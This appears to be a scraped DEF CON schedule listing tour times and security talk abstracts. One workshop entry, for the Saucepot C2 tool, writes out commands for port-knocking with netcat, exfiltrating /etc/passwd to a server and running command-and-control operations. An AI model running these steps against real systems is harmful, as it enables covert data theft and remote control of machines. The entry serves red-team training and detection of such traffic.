| Sunday | 10:30 | Car Hacking Village | Samantha |
| Sunday | 11:00 | DDoS Community | NEED GUIDE |
| Sunday | 11:30 | Telecom Village | NEED GUIDE |
| Sunday | 12:00 | Crypto Privacy Village | Madi S |
| Sunday | 12:30 | Voting Village | Samantha |
| Sunday | 13:00 | GameHacking.GG | Madi S |
- ics Calendar file
For those who find it hard to dive into something new alone, we will be offering small tour groups to take people around to various villages, contests and communities. We will meet in the LVCC West Hall - South Entrance, look for the butterfly logo banner! We will then leave for the village/contest/event/community as a group, hang out there for 15 minutes or so, and then you may choose to return to the lobby with the group or stay in the village. We are NOT members of where we are going to tour, we are all finding out about the cool things at DEF CON together.
| Weekday | Time | Destination | Tour Guide |
|---|---|---|---|
| Friday | 10:00 | Lonely Hackers Club | Madi S |
| Friday | 10:30 | Noob Community | Samantha |
| Friday | 11:00 | Octopus Game | Madi S |
| Friday | 11:30 | Biohacking Village | Samantha |
| Friday | 12:00 | Scavenger Hunt | Madi S |
| Friday | 12:30 | AppSec Village | Samantha |
| Friday | 13:00 | Embedded Systems Village | Madi S |
| Friday | 13:30 | AI Village | Samantha |
| Friday | 14:00 | OWASP | Erin |
| Friday | 14:30 | Blacks In Cyber Village | NEED GUIDE |
| Friday | 15:00 | Nautilus - CTF (watch) | Erin |
| Friday | 15:30 | Ham Radio Village | NEED GUIDE |
| Friday | 16:00 | Aerospace Village | Erin |
| Friday | 16:30 | Hardware Hacking Village | NEED GUIDE |
| Friday | 17:00 | IOT Village | Erin |
| Friday | 17:15 | ICS Village | NEED GUIDE |
| Saturday | 10:00 | Pinball Contest | Stryker |
| Saturday | 10:30 | Lock Pick Village | Madi S |
| Saturday | 11:00 | Data Duplication Village | Stryker |
| Saturday | 11:30 | Malware Village | Madi S |
| Saturday | 12:00 | RF Village | Stryker |
| Saturday | 12:30 | Maritime Hacking Village | Madi S |
| Saturday | 13:00 | Hard Hat Brigade | Ethan |
| Saturday | 13:30 | Payment Village | Madi S |
| Saturday | 14:00 | Cryptocurrency Contest and Community | Ethan |
| Saturday | 14:30 | Physical Security Village | Samantha |
| Saturday | 15:00 | Capture the Packet / Packet Hacking Village | NEED GUIDE |
| Saturday | 15:30 | Quantum Village | Samantha |
| Saturday | 16:00 | Adversary Village | ScorpVayne |
| Saturday | 16:30 | Policy Village | Samantha |
| Saturday | 17:00 | Blue Team Village (BTV) | ScorpVayne |
| Saturday | 17:15 | Recon Village | Samantha |
| Sunday | 10:00 | Bug Bounty Village | NEED GUIDE |
| Sunday | 10:30 | Car Hacking Village | Samantha |
| Sunday | 11:00 | DDoS Community | NEED GUIDE |
| Sunday | 11:30 | Telecom Village | NEED GUIDE |
| Sunday | 12:00 | Crypto Privacy Village | Madi S |
| Sunday | 12:30 | Voting Village | Samantha |
| Sunday | 13:00 | GameHacking.GG | Madi S |
- ics Calendar file
For those who find it hard to dive into something new alone, we will be offering small tour groups to take people around to various villages, contests and communities. We will meet in the LVCC West Hall - South Entrance, look for the butterfly logo banner! We will then leave for the village/contest/event/community as a group, hang out there for 15 minutes or so, and then you may choose to return to the lobby with the group or stay in the village. We are NOT members of where we are going to tour, we are all finding out about the cool things at DEF CON together.
| Weekday | Time | Destination | Tour Guide |
|---|---|---|---|
| Friday | 10:00 | Lonely Hackers Club | Madi S |
| Friday | 10:30 | Noob Community | Samantha |
| Friday | 11:00 | Octopus Game | Madi S |
| Friday | 11:30 | Biohacking Village | Samantha |
| Friday | 12:00 | Scavenger Hunt | Madi S |
| Friday | 12:30 | AppSec Village | Samantha |
| Friday | 13:00 | Embedded Systems Village | Madi S |
| Friday | 13:30 | AI Village | Samantha |
| Friday | 14:00 | OWASP | Erin |
| Friday | 14:30 | Blacks In Cyber Village | NEED GUIDE |
| Friday | 15:00 | Nautilus - CTF (watch) | Erin |
| Friday | 15:30 | Ham Radio Village | NEED GUIDE |
| Friday | 16:00 | Aerospace Village | Erin |
| Friday | 16:30 | Hardware Hacking Village | NEED GUIDE |
| Friday | 17:00 | IOT Village | Erin |
| Friday | 17:15 | ICS Village | NEED GUIDE |
| Saturday | 10:00 | Pinball Contest | Stryker |
| Saturday | 10:30 | Lock Pick Village | Madi S |
| Saturday | 11:00 | Data Duplication Village | Stryker |
| Saturday | 11:30 | Malware Village | Madi S |
| Saturday | 12:00 | RF Village | Stryker |
| Saturday | 12:30 | Maritime Hacking Village | Madi S |
| Saturday | 13:00 | Hard Hat Brigade | Ethan |
| Saturday | 13:30 | Payment Village | Madi S |
| Saturday | 14:00 | Cryptocurrency Contest and Community | Ethan |
| Saturday | 14:30 | Physical Security Village | Samantha |
| Saturday | 15:00 | Capture the Packet / Packet Hacking Village | NEED GUIDE |
| Saturday | 15:30 | Quantum Village | Samantha |
| Saturday | 16:00 | Adversary Village | ScorpVayne |
| Saturday | 16:30 | Policy Village | Samantha |
| Saturday | 17:00 | Blue Team Village (BTV) | ScorpVayne |
| Saturday | 17:15 | Recon Village | Samantha |
| Sunday | 10:00 | Bug Bounty Village | NEED GUIDE |
| Sunday | 10:30 | Car Hacking Village | Samantha |
| Sunday | 11:00 | DDoS Community | NEED GUIDE |
| Sunday | 11:30 | Telecom Village | NEED GUIDE |
| Sunday | 12:00 | Crypto Privacy Village | Madi S |
| Sunday | 12:30 | Voting Village | Samantha |
| Sunday | 13:00 | GameHacking.GG | Madi S |
- ics Calendar file
For those who find it hard to dive into something new alone, we will be offering small tour groups to take people around to various villages, contests and communities. We will meet in the LVCC West Hall - South Entrance, look for the butterfly logo banner! We will then leave for the village/contest/event/community as a group, hang out there for 15 minutes or so, and then you may choose to return to the lobby with the group or stay in the village. We are NOT members of where we are going to tour, we are all finding out about the cool things at DEF CON together.
| Weekday | Time | Destination | Tour Guide |
|---|---|---|---|
| Friday | 10:00 | Lonely Hackers Club | Madi S |
| Friday | 10:30 | Noob Community | Samantha |
| Friday | 11:00 | Octopus Game | Madi S |
| Friday | 11:30 | Biohacking Village | Samantha |
| Friday | 12:00 | Scavenger Hunt | Madi S |
| Friday | 12:30 | AppSec Village | Samantha |
| Friday | 13:00 | Embedded Systems Village | Madi S |
| Friday | 13:30 | AI Village | Samantha |
| Friday | 14:00 | OWASP | Erin |
| Friday | 14:30 | Blacks In Cyber Village | NEED GUIDE |
| Friday | 15:00 | Nautilus - CTF (watch) | Erin |
| Friday | 15:30 | Ham Radio Village | NEED GUIDE |
| Friday | 16:00 | Aerospace Village | Erin |
| Friday | 16:30 | Hardware Hacking Village | NEED GUIDE |
| Friday | 17:00 | IOT Village | Erin |
| Friday | 17:15 | ICS Village | NEED GUIDE |
| Saturday | 10:00 | Pinball Contest | Stryker |
| Saturday | 10:30 | Lock Pick Village | Madi S |
| Saturday | 11:00 | Data Duplication Village | Stryker |
| Saturday | 11:30 | Malware Village | Madi S |
| Saturday | 12:00 | RF Village | Stryker |
| Saturday | 12:30 | Maritime Hacking Village | Madi S |
| Saturday | 13:00 | Hard Hat Brigade | Ethan |
| Saturday | 13:30 | Payment Village | Madi S |
| Saturday | 14:00 | Cryptocurrency Contest and Community | Ethan |
| Saturday | 14:30 | Physical Security Village | Samantha |
| Saturday | 15:00 | Capture the Packet / Packet Hacking Village | NEED GUIDE |
| Saturday | 15:30 | Quantum Village | Samantha |
| Saturday | 16:00 | Adversary Village | ScorpVayne |
| Saturday | 16:30 | Policy Village | Samantha |
| Saturday | 17:00 | Blue Team Village (BTV) | ScorpVayne |
| Saturday | 17:15 | Recon Village | Samantha |
| Sunday | 10:00 | Bug Bounty Village | NEED GUIDE |
| Sunday | 10:30 | Car Hacking Village | Samantha |
| Sunday | 11:00 | DDoS Community | NEED GUIDE |
| Sunday | 11:30 | Telecom Village | NEED GUIDE |
| Sunday | 12:00 | Crypto Privacy Village | Madi S |
| Sunday | 12:30 | Voting Village | Samantha |
| Sunday | 13:00 | GameHacking.GG | Madi S |
- ics Calendar file
Come sit down and take a self guided journey to learn something hands on with us. We have an array of skills to learn including FleetDM, Linux, NetworkOS, Botnets, and others as well! We have people there to help answer your questions if things get a little dicey and make sure you have the best time while picking up something new.
- ics Calendar file
The fabled Wall Of Sheep…
- ics Calendar file
The session is a case study about how the WAPDropper Android malware abuses premium telecom calling services. It explains how a user unknowingly installs the malware and then gets billed without their consent. The session also demonstrates how a legitimate-looking application can be used to exploit WAP billing mechanisms.
SpeakerBio: Ravi Rajput
- ics Calendar file
Last year, we introduced the Warflying project - collecting information about wireless access points from a small airplane. This presentation will share our ongoing research, including things we have learned about the sniffing process and the impact of improved equipment, along with enhanced data analysis and visualizations to continue attempting to answer questions like “How many access points can you actually pick up from an airplane?”, “Is warflying better than wardriving or warbiking or warwarlking or warswimming?”, “Should I run WiGLE on my phone during my airline flight?”, “Are the airplanes flying overhead monitoring my WiFi?”, and “Why are you even doing this?”
Speakers:Matthew Thomassen,Sean McKeeverMatthew Thomassen has been doing computer security since before it was cool and is currently a Security Architect in a financial organization, with previous experience in the consumer healthcare and automotive sectors, which afforded him the opportunity to help with random things in the early days of the Car Hacking Village. He is a certified Commercial Pilot with Multiengine and Instrument ratings, as well as an Airframe & Powerplant Mechanic. He is also an Extra Class Amateur Radio operator and has an MBA, though he tries not to live and die by Excel spreadsheets.
SpeakerBio: Sean McKeeverSean McKeever is a Senior Security Researcher, specializing in automotive/mobility security, and embedded systems reverse engineering. Previously he worked as a Cybersecurity Architect at global automotive OEM where he secured advanced transportation mobility platforms and served as the company’s Bug Bounty Program Manager. Outside of Sean’s employment, he co-founded the Detroit chapter of the Automotive Security Research Group (ASRG), developed the RoboCar Platform, and has contributed to Car Hacking Village CTFs for DEFCON and GRRCon, and the general CTFs for Converge and BSides Detroit.
- ics Calendar file
Get ready for a live demo of full-blown cloud compromise - starting from an innocent-looking SageMaker AI notebook and ending in complete AWS account takeover. Using nothing more than the default SageMaker AI setup granted to data scientists, this session showcases how attackers can chain together misconfigurations across IAM, SecretsManager, ECR, and network layers to take control of the environment from the inside out. But that’s just the beginning.
This talk also features the exclusive release of a new open source tool- the first offensive framework built to simulate and execute post-exploitation in SageMaker AI environments. Red teams can weaponize it. Defenders can validate exposures. Either way, it shines a spotlight on one of the cloud’s most overlooked attack surfaces: managed AI infrastructure.
Drawing on real-world experience from offensive operations against cloud environments around the world - including enterprise and nation-level targets - this session breaks down how AI services like SageMaker AI are quietly becoming powerful post-exploitation platforms. SageMaker AI was designed to train models, not attackers - but with its comfort-first design, permissive defaults, and excessive trust relationships, it quietly offers everything needed for stealthy lateral movement and infrastructure-wide compromise.
This talk is for red teamers, defenders, and anyone building or securing ML workloads in the cloud. Expect real attack chains, real tools, and a view into how attackers are targeting AI infrastructure in the wild - and why most environments aren't ready for it.
SpeakerBio: Shani PeledShani Peled is a Senior Cloud Security Researcher at SentinelOne. She began her career in the Israeli Intelligence Corps, where she served as the only female hacker on her cyber defense team. After two years defending critical infrastructure, she transitioned into offensive security, spending four years as a red teamer targeting enterprise environments around the world — including multiple Fortune 500, Fortune 100, and Fortune 50 companies. Today, she brings that offensive mindset to cloud and AI research, focusing on exposing real-world threats in modern cloud infrastructure.
- ics Calendar file
Game cheats and malware share the same stealthy DNA - this talk breaks down how. We’ll explore cheat loaders and draw parallels between anti-cheat countermeasures and enterprise EDR techniques.
SpeakerBio: Joe "Juno" Aurelio, Security ResearcherJoe Aurelio is a distinguished security researcher with over a decade of hands-on experience in vulnerability research, reverse engineering, and mobile security. He currently leads teams of researchers in the private sector securing large-scale technology platforms. His expertise spans both the private and defense sectors, with a track record of uncovering critical security vulnerabilities in mobile applications and complex infrastructure affecting millions of users. In addition to his work in traditional security domains, he channels his passion for cybersecurity education with a unique interest in exploring game hacking techniques. He is a lead of the Game Hacking Village, where he teaches security by turning game hacks into ethical and engaging educational tools. Joe has a broad background in security, underscored by the highly respected OSCP certification and a Master’s degree in computer science.
- ics Calendar file
This beginner-friendly presentation introduces amateur radio operators and enthusiasts to popular digital modes, highlighting recent advances and innovations. Attendees will learn the basics of well-known digital modes such as APRS, FT8, FT4, and JS8Call, and discover new and emerging technologies, including FreeDV’s RADE and the open-source M17 protocol. The session emphasizes accessible and affordable equipment and software solutions, ensuring that both new and returning participants leave with fresh insights and practical guidance for exploring digital amateur radio.
Digital modes continue to transform amateur radio, offering efficient communication methods and exciting new possibilities. This updated introductory presentation for amateur radio operators and hobbyists covers essential digital modes commonly used across HF, VHF, and UHF bands, providing foundational knowledge and recent developments.
Participants will:
This presentation is designed to appeal to newcomers, while offering valuable updates and fresh content for returning attendees.
SpeakerBio: Jon "K4CHN" MarlerJon is the Cybersecurity Evangelist at VikingCloud with a true passion for information security. Jon is an amateur radio operator, lockpicker, phreaker, repairer of all things, and maker. As a result of his long-standing commitment to open source software, Jon has offered his expertise as a package manager for the Debian GNU/Linux OS distribution since 1998.
- ics Calendar file
As software supply chains embrace transparency through SBOMs, hardware remains a black box. Yet the chips inside our IoT devices carry just as much — if not more — risk. From cloned components to opaque fabs, the semiconductor supply chain is fast becoming a national security flashpoint. Governments are scrambling to respond with blunt tools like bans and onshoring, but these approaches are slow, costly, and often impractical. Traditional BOMs focus on procurement and production — what gets bought and assembled — but they rarely capture origin, integrity, or risk context. They weren’t built to expose inter-organizational dependencies or detect supply chain manipulation. Enter the HBOM Initiative — a new effort to bring visibility, traceability, and accountability to the hardware supply chain. By developing tools and practices for a hardware bill of materials (HBOM), we aim to expose hidden risks, trace chip provenance, and empower sectors to make smarter, risk-informed decisions without sacrificing adaptability or innovation. This talk will explore why HBOMs are inevitable, what makes them hard, and how the hacker and security community can help shape the future of hardware trust.
SpeakerBio: Allan Friedman, Adjunct Professor of Informatics at the Luddy School of Informatics, Computing, and Engineering at Indiana UniversityDr. Allan Friedman is internationally recognized for leading the global Software Bill of Materials (SBOM) movement, transforming it from a niche idea into a widely adopted pillar of cybersecurity policy and practice. Over his decade in public service, Friedman held senior roles at the Cybersecurity and Infrastructure Security Agency (CISA) and the National Telecommunications and Information Administration (NTIA), where he built and led groundbreaking efforts on SBOM, coordinated vulnerability disclosure, and IoT security. He has partnered with governments and regulators in Europe and Asia, and continues to advise public- and private-sector organizations on building trust and resilience into the systems that matter most.
Before his time in government, Friedman spent over a decade as a researcher and technologist, holding positions at Harvard University’s Computer Science department, the Brookings Institution, and George Washington University’s Engineering School.
- ics Calendar file
Bitdefender invites you to solve a few challenges that will get you familiar with the inner workings oof the Matter Protocol.
Smart home promises seamless living with lights, locks, sensors, and thermostats, all speaking the same language.
But behind the comfort of voice commands and automated routines lies a tangled web of wireless protocols and IoT standards like Matter.
Can you disrupt, decode of dominate the smart home?
- ics Calendar file
The RP2350 hacking challenge, released last year at Defcon, led to multiple exciting attacks against the RP2350's bootloader. This session will provide a technical deep dive into one of these attacks: Forcing an unverified vector boot via voltage fault injection. Equipped with an RP2350 security playground board, we will provide a run-down of the discovery process and experimentally verify different building blocks leading up to the attack.
SpeakerBio: Marius MuenchMarius Muench is an assistant professor at the University of Birmingham. His research interests cover (in-)security of embedded systems, binary & microarchitectural exploitation, and defenses. He obtained his PhD from Sorbonne University in cooperation with EURECOM and worked as a postdoctoral researcher at the Vrije Universiteit Amsterdam. He developed and maintains avatar2, a framework for analyzing embedded systems firmware, and FirmWire, an emulation and fuzzing platform for cellular basebands. Throughout his career, Marius publicly shared his findings and presented at venues such as Black Hat, Reverse.io, REcon, and Hardwear.io.
- ics Calendar file
In the March 2020 'Super Tuesday' Primary Election, LA County debuted its brand new, $300 million, bespoke, Smartmatic-contracted VSAP (Voting Solutions for All People) voting system. Before the night was over, the Bernie Sanders presidential campaign had already filed suit (due to multiple technology failures resulting in hours-long lines). That election night proved to be illustrative of the myriad problems with VSAP, including numerous security vulnerabilities. These were compounded by the failure to fulfill a much-ballyhooed commitment by the County to disclose the source code. Perhaps the most significant failing was only revealed weeks later after the machine count had finally been completed. A knife's edge result in LA County's second largest city, Long Beach, for a local ballot measure, led to a voter-requested recount and an eye-opening odyssey for a local government accountability grassroots organization. Ian Patton will discuss that journey in pursuit of a simple and accurate local election result.
SpeakerBio: Ian Patton, Long Beach Reform CoalitionIan Patton is the co-founder and volunteer executive director of the Long Beach Reform Coalition. He earned a bachelor's degree from the University of California, Berkeley in 2002. His career experience includes working in real estate.
- ics Calendar file
Cryptocurrency is everywhere now. Billion-dollar companies are built on it, entire economies run on Bitcoin, and cybercriminals love using it to finance their operations or hide stolen money. Cryptocurrencies promise anonymity, yet blockchain transactions are fully public, and make it tricky to hide funds.
In February 2025, the Bybit breach exposed two advanced attack vectors. First, a third-party wallet tool was compromised through malicious JavaScript injected into its logic, allowing attackers to manipulate smart contract behavior. Second, a SAFE Wallet developer was tricked through social engineering into running a fake Docker container, giving attackers persistent access to his machine.
With control established, they hijacked proxy contracts and executed stealth withdrawals of ETH and ERC-20 tokens. The stolen assets were laundered through decentralized exchanges, split across multiple wallets, bridged to Bitcoin, and passed through mixers like Wasabi Wallet.
So how do attackers manage to launder crypto, and how can we stop them? Using the 1.46 billion dollar Bybit hack by North Korea’s Lazarus Group as a case study, this talk breaks down each laundering step and explains how to automate tracking and accelerate investigations using AI.
References:
SpeakerBio: Thomas "fr0gger_" Roccia, Senior Security Researcher at MicrosoftThomas Roccia is a Senior Security Researcher at Microsoft with over 15 years of experience in the cybersecurity industry. His work focuses on threat intelligence and malware analysis.
Throughout his career, he has investigated major cyberattacks, managed critical outbreaks, and collaborated with law enforcement while tracking cybercrime and nation-state campaigns. He has traveled globally to respond to threats and share his expertise.
Thomas is a regular speaker at leading security conferences and an active contributor to the open-source community. Since 2015, he has maintained the Unprotect Project, an open database of malware evasion techniques. In 2023, he published Visual Threat Intelligence: An Illustrated Guide for Threat Researchers, which became a bestseller and won the Bronze Foreword INDIES Award in the Science & Technology category.
- ics Calendar file
Port knocking is a stealthy network authentication technique (T1205.001) in which a client sends a specific sequence of connection attempts (or "knocks") to closed ports on a server. When the correct sequence is received, the server dynamically opens a port or triggers an action, enabling concealed access or communication. Saucepot C2 elevates the port knocking technique to a new level. Instead of using destination ports (DstPorts) in TCP sessions as knock sequences, it leverages source ports (SrcPorts), also known as ephemeral ports. This approach allows data exfiltration even in highly restrictive firewall environments where only a single outbound port, such as port 443, is allowed.
In this workshop, attendees will use Saucepot C2 in conjunction with the following MITRE ATT&CK techniques to conduct specific Red Team activities:
| Technique ID | Technique Name | Tactic |
|---|---|---|
| T1041 | Exfiltration Over C2 Channel | Exfiltration |
| T1071.001 | Application Layer Protocol: Web | Command and Control |
| T1205.001 | Traffic Signaling: Port Knocking | Command and Control / Defense Evasion |
Saucepot C2 has been open-sourced at https://github.com/netskopeoss/saucepot. Supported commands or features in Sacuepot C2 include: - Check-in / heartbeat - Directory listing - Process listing - File upload
Server:
sudo apt install net-tools knockd nginx python3-pip python3-scapy
git clone https://github.com/netskopeoss/saucepot
echo "v2025.8" | sudo tee /var/www/html/chk-version
Client:
sudo apt install net-tools python3-tqdm python3-psutil python3-pycurl
git clone https://github.com/netskopeoss/saucepot
Server: Hide the web server until the correct knock sequences (4100, 4200, 4500) have been provided.
sudo iptables -I INPUT -p tcp --dport 80 -j REJECT
sudo systemctl start nginx
Add the following section to /etc/knockd.conf
[OpenCloseSecretWeb]
sequence = 4100,4200,4500
seq_timeout = 30
tcpflags = syn
start_command = /usr/sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
cmd_timeout = 7200
stop_command = /usr/sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
If the default interface is not eth0, add Interface = InterfaceName to the [options] section.
Restart the knockd:
sudo systemctl restart knockd
Client:
The protected web service should be unreachable by default.
curl http://server_public_ip
Provide the correct knock sequences; the protected web service should now be reachable.
for f in 4100 4200 4500; do nc -w2 server_public_ip $f; done
curl http://server_public_ip
Exercise 2: Ephemeral port checker Check whether you're in a friendly environment where the client's source port is preserved after NAT, a crucial requirement for ephemeral port abuse to work. If the laptop's network environment fails the test, an additional VPC instance will be needed to act as the client.
Server:
sudo systemctl stop nginx
sudo python3 saucepot-server.py -c -p 80
Client: ``` python3 saucepot-client.py -c -d server_public_ip -p 80
Test 1 with ephemeral port 63034: PASS Test 2 with ephemeral port 51151: PASS Test 3 with ephemeral port 54321: PASS
Ephemeral port test succeeded. Enjoy Port Knocking 2.0 technique! ```
Exercise 3: Data exfiltration Exfiltrate a specified file to the server without establishing persistent TCP connections. The connection state is managed through different port-knocking sequences, such as session-start and session-end. The data to be exfiltrated is transmitted via the source port (SrcPort) field of TCP packets within a designated port range.
Server:
sudo python3 saucepot-server.py -d 172.31.253.199 -p 80
Client:
Exfiltrate /etc/passwd to the server
python3 saucepot-client.py -d server_public_ip -p 80 --upload /etc/passwd
Exercise 4: Command-and-control operations To achieve bidirectional communication, the Last-Modified header in HTTP responses is used to deliver C2 commands to the client. Saucepot C2 currently supports a few simple commands, such as ls, ps, and others.
Server:
sudo systemctl start nginx
sudo python3 saucepot-server.py -d 172.31.253.199 -p 80
Client:
python3 saucepot-client.py -d server_public_ip -p 80
Exercise 5: Observation of anomalies at L4 and L7 Observe the anomalies at L4 and L7
On the server, in two separate windows:
web access log:
tail -F /var/log/nginx/access.log
SYN packets:
sudo tcpdump -i enX0 -n 'tcp[tcpflags] & tcp-syn != 0'
This workshop has been verified on Ubuntu 24.04 LTS
-d ip arg on ServerHubert Lin is an offensive security expert specializing in remote vulnerability exploitation, honeypots, and penetration testing. He previously led a signature team for network threat defense and served as a senior staff engineer on a Red Team, where he evaluated network intrusion prevention systems and conducted sanctioned red team exercises to strengthen corporate security. Hubert holds certifications as a Red Hat Certified Engineer (RHCE) and an Offensive Security Certified Professional (OSCP). Currently, he works at Netskope as a Principal Researcher and has talked at DEFCON Cloud Village, RSAC, BSidesLV, BSidesSG, Australian CyberCon, GovWare, and CYBERSEC in the past few years.
- ics Calendar file
It’s not every day you stumble upon a technique that enables remote code execution (RCE) in thousands of AWS accounts at once—but that’s exactly what happened with the whoAMI attack. By researching a known misconfiguration through a new lens, we discovered how to gain access to thousands of AWS accounts that unknowingly use an insecure pattern when retrieving AMI IDs.
By carefully naming a malicious AMI, an attacker can trick vulnerable Terraform code, AWS CLI scripts, and even third-party CI/CD systems into running the wrong AMI. I’ll explain how I uncovered this vulnerability, show proof-of-concept demos, and share how I discovered this vulnerability affected a third party continuous integration platform used by many popular open source projects, and how even some of AWS’s own internal systems were vulnerable to this attack.
If you’ve ever launched an EC2 instance, this talk is for you: learn how cloud image name-confusion attacks can be used by attackers to gain initial access to cloud environments and how you can prevent them.
SpeakerBio: Seth ArtSeth Art is currently a Security Researcher & Advocate at Datadog. Prior to joining Datadog, Seth created and led the Cloud Penetration Testing practice at Bishop Fox. He is the author of many open source tools including BadPods, IAMVulnerable, and CloudFoxable, and the co-creator of the popular cloud penetration testing tool, CloudFox.
- ics Calendar file
Kit cost $180
- ics Calendar file
Join Women in Security and Privacy (WISP) and Blue Team Village for a Movie Night and Mixer at DEF CON on Saturday, August 9! It's the perfect way to relax, connect, and geek out with fellow defenders, hackers, and privacy pros. Snacks and beverages provided.
No RSVP needed - just your DEF CON badge and your chill vibes. Let’s make it a night to remember!
SpeakerBio: WISP + BTV
- ics Calendar file
Whether you're here to connect, learn, or just vibe with fellow privacy and security advocates, this group activity is your chance to make memories with the Women in Security and Privacy community at DEF CON. Come as you are, leave with new friends, inspiration, and a photo that marks your place in this powerful movement.
- ics Calendar file
Celebrate and empower queer women, power-houses of the hackersphere. Meet and mingle with peer community!
- ics Calendar file
In a world flooded with data, how do threat intelligence teams stay focused, effective, and impactful? This panel brings together seasoned cyber threat intelligence (CTI) practitioners to discuss practical workflows that scale. From validating external intelligence and navigating attribution debates to integrating LLMs and purpose-built AI tools, panelists will explore the realities of operationalizing CTI, managing confidence in analysis, and ensuring intelligence drives detection, response, and decision makers. Topics include naming conventions and clustering methodologies, cross-team collaboration models, and what it really takes to make CTI actionable in modern organizations. We’ll also cover emerging threats worth tracking now, from Chinese targeting of edge devices to DPRK-linked remote employment fraud. Whether you’re building a new team or refining a mature program, this discussion will offer actionable insight and hard-won lessons for working smarter and pivoting faster.
Speakers:Audra Streetman,Coleman Kane,Kurt Hoffman,Silas CutlerAudra Streetman is a member of Splunk’s global security team and a former contributor to the SURGe research group. She began her career as a journalist, reporting for local TV stations across the U.S., before transitioning into cybersecurity. Audra has shared her career journey at conferences hosted by WiCyS, RSAC, and SANS. As co-host of The Security Detail podcast and editor of Bluenomicon: A Network Defender’s Compendium, she is passionate about making complex security topics accessible and engaging. In 2025, she was honored as a SIA WISF Power 100 recipient and nominated as “Most Inspiring Up & Comer” in the CyberScoop 50 awards.
SpeakerBio: Coleman KaneColeman is a Principal Security Engineer for Microsoft Security's AI Research team, helping to build AI tools and capabilities to solve security problems.
Coleman has 15+ years of experience in cybersecurity. He worked for 12 years in the DIB at GE Aviation in roles as a malware analyst, cyber threat intelligence analyst, CTI program manager, and principal technologist in cybersecurity for the company. Over the course of those roles he worked with industry and government partners to track nation-state and other criminal adversaries, built analysis tools and platforms to push the organization forward. Later, Coleman worked in the security vendor space for Attack Surface Management (ASM) and Managed Detection and Response (MDR) service providers, before coming to Microsoft.
While working at GE Aviation, Coleman also advised the University of Cincinnati on its NSA Certified Center of Academic Excellence in Cyber Operations (CAE-CO) program. As part of this collaboration, Coleman taught a graduate-level Malware Analysis and Reverse Engineering course for multiple years as an adjunct professor in the Computer Science department at UC, to contribute industry expertise to the program. The course materials are available for free online.
SpeakerBio: Kurt HoffmanSilas Cutler is a Principal Security Researcher at Censys, where he brings over a decade of specialized experience in tracking organized cyber threat groups and developing advanced pursuit methodologies. Throughout his distinguished career, Silas has held leadership positions at premier cybersecurity organizations, including roles as Resident Hacker for Stairwell, Reverse Engineering Lead for Google Chronicle, and Senior Security Researcher on CrowdStrike's Intelligence team.
Since 2021, he has played an instrumental role in advancing the Ransomware Task Force's initiatives and as an adjunct supporting the Institute of Technology, fostering critical collaboration between public and private sectors in combating ransomware threats.
Silas is also the founder and lead developer of MalShare, a pioneering public malware repository that has supported the global security research community since 2013.
- ics Calendar file
A collection of images and quips that are related to the topic of being a wardriver. Images are SFW and culled from social media and other sources within the community. Presentation heavily relies on MrBill's rapier wit and CoD_Segfault's unmatched technical abilities to provide a narration of this curated collection.
Speakers:MrBill,CoD_SegfaultMrBill started Wardriving in 2003 after attending DC11 and started contributing to Wigle in 2007. He took a break for about a decade (kids) and started up again in 2017 in earnest, and later founded the HardHatBrigade WiGLE group. He passed D4rkM4tter in the global rankings around 2022 and continues to trail @CoD_Segfault in their race to 1 Million WiGLE points. He is often seen at security conferences with a hard hat, mostly with some sort of wardriving functionality. Join him and the rest of the HHB crew in the 24 Hour wardriving event in October.
SpeakerBio: CoD_Segfault, Organizer at Hard Hat BrigadeCoD_Segfault first went wardriving around 2004, but really kicked up the game in 2021 when joining HardHatBrigade on WiGLE. By 2023, his focus shifted to smaller and more portable wardriving solutions suitable for walking and bike riding. Notable works include ultra small ESP32 wardrivers based on the wardriver.uk project and creation of the BW16-Open-AT project to improve network identification and remove reliance on the closed-source AT firmware.
- ics Calendar file
How to share your knowledge with the community
SpeakerBio: James McQuiggan, Cybersecurity Advocate
- ics Calendar file
While passkeys are being touted as the end of phishing, they might be putting your organization at even more risk. In this talk I will demonstrate a relatively straightforward phishing attack against “phishing-resistant” synced passkeys and provide guidance and advice for responsible passkey usage.
SpeakerBio: Chad Spensky, Allthenticate, Ph.D.Chad is a teenage hacker turned cybersecurity expert who studied under the best in his field at UNC-CH, UCSB’s SecLab, IBM Research, and was a lead researcher at MIT LL where he played a pivotal role in various high-impact projects for the US DoD. He has broken every authentication system under the sun and has committed his career to doing better for our society.
- ics Calendar file
- ics Calendar file
Many organisations are moving to Zero Trust Network Access (ZTNA) and Secure Access Service Edge (SASE) solutions in response to the real and well-documented risks associated with traditional VPNs. These cloud-era alternatives promise improved security through finer-grained access controls and better posture enforcement. But are these 'next-gen' cloud VPNs truly secure? In this 45-minute session, we present new research revealing that many leading ZTNA platforms - including offerings from ZScaler, Netskope and Check Point - inherit legacy VPN weaknesses while introducing fresh cloud-based attack surfaces.
We demonstrate the process of external recon, bypassing authentication and device posture checks (including hardware ID spoofing) and abuse insecure inter-process communication (IPC) between ZTNA client components to achieve local privilege escalation. We show it is possible to circumvent traffic steering to reach blocked content, exploit flaws in authentication flows to undermine device trust, and even run malicious ZTNA servers that execute code on connecting clients. Throughout the presentation, we highlight previously undisclosed vulnerabilities identified during our research. Zero trust does not mean zero risk.
References:
Red Team Operator at AmberWolf (formerly with NCC Group). Co-presenter of 'Very Pwnable Networks: Exploiting the Top Corporate VPN Clients for Remote Root and SYSTEM Shells' at SANS HackFest Hollywood 2024. David has led red team operations uncovering critical flaws in enterprise remote access tools and has a passion for reverse engineering security products.
SpeakerBio: Rich "Buffaloverflow" Warren, Red Team Operator at AmberWolfRed Team Operator at AmberWolf and Microsoft Top 100 Security Researcher (formerly with NCC Group). Co-presenter of 'Very Pwnable Networks: Exploiting the Top Corporate VPN Clients…' at HackFest Hollywood 2024. Richard has a track record of discovering novel vulnerabilities in VPN and zero-trust clients and has contributed to multiple high-profile vulnerability disclosures and tools in the offensive security community.
- ics Calendar file